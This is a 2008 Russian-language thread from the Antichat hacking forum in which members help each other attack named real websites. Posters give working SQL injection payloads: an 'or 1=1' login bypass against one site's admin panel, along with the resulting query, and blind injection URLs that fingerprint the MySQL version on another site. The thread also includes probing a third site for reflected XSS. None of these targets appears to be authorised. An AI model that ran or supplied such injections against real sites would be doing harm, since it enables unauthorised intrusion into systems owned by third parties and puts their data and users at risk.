Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

11.03.2008, 22:01
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме: 350782
Репутация:
81
|
|
Скажите что такое выдает сканер NRG что за уязвимости такие или что это?
Найдено: http://XXX.kz/?PageServices
Найдено: http://XXX.kz/?wp-cs-dump
Найдено: http://XXX.kz/?wp-html-rend
Найдено: http://XXX.kz/?wp-stop-ver
Найдено: http://XXX.kz/?wp-uncheckout
Найдено: http://XXX.kz/?wp-usr-prop
Найдено: http://XXX.kz/?wp-ver-diff
Найдено: http://XXX.kz/?wp-verify-link
Найдено: http://XXX.kz/?wp-ver-info
перехожу по этим ссылкам ни чего не происходит
|
|
|

11.03.2008, 23:09
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме: 350782
Репутация:
81
|
|
http://agrealt.ru/admin/
тут в админке sql я так понял что пароль пустое поле а login какой? что то там запросы не составляются или я что то не правильно делаю
|
|
|

11.03.2008, 23:20
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме: 21768337
Репутация:
3486
|
|
Table 'realto_base.users' doesn't exist
=\
|
|
|

12.03.2008, 01:18
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
ага
SELECT user_id FROM realto_base.users WHERE LOWER(user_login)="1" or 1=1/*" AND LOWER(user_pwd)="c1562365960602e0b66d39995ec882cf" ;
Table 'realto_base.users' doesn't exist
сталобыть кто-то похерил админку, или админы кривые
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

12.03.2008, 17:44
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме: 350782
Репутация:
81
|
|
Вем спасибо всем плюсую)))
ЗЫ: думал что туплю
|
|
|

12.03.2008, 17:49
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме: 350782
Репутация:
81
|
|
Помогите разобраться есть ли тут пассивная XSS или нет, что ни пробую не получается
http://nkregion.kz/index.php?IDAdmin=test
|
|
|

12.03.2008, 18:12
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме: 682079
Репутация:
137
|
|
Помогите разобраться есть ли тут пассивная XSS или нет, что ни пробую не получается
http://nkregion.kz/index.php?IDAdmin=test
Error!
CuteNews has detected that...
CuteNews там, врядли найдешь ХСС просто так.
Багтраки почитай лучше, или в сорцы лезь.
|
|
|

12.03.2008, 18:43
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме: 280720
Репутация:
141
|
|
[Code]http://www.wingate.com/news.php?id=50'[/СODE]
вроде есть скуль запросы типа выдают одну и ту же страницу
Код:
http://www.wingate.com/news.php?id=50-1
http://www.wingate.com/news.php?id=49
а с подзапросами что то странное твориться не одни не выполняться O_o
|
|
|

12.03.2008, 18:51
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
как не выполняются?
http://www.wingate.com/news.php?id=49%20and%20(select%201)=1
5ый мускул
http://www.wingate.com/news.php?id=49%20and%20substring(version(),1,1)=5
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

12.03.2008, 18:53
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
Сообщение от truelamer
Скажите что такое выдает сканер NRG что за уязвимости такие или что это?
Найдено: http://XXX.kz/?PageServices
Найдено: http://XXX.kz/?wp-cs-dump
Найдено: http://XXX.kz/?wp-html-rend
Найдено: http://XXX.kz/?wp-stop-ver
Найдено: http://XXX.kz/?wp-uncheckout
Найдено: http://XXX.kz/?wp-usr-prop
Найдено: http://XXX.kz/?wp-ver-diff
Найдено: http://XXX.kz/?wp-verify-link
Найдено: http://XXX.kz/?wp-ver-info
перехожу по этим ссылкам ни чего не происходит
это старые серверные уязвимости, не встречаются уже пару лет. даже не уязвимости, а фичи, показывающую инфу о серваке
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|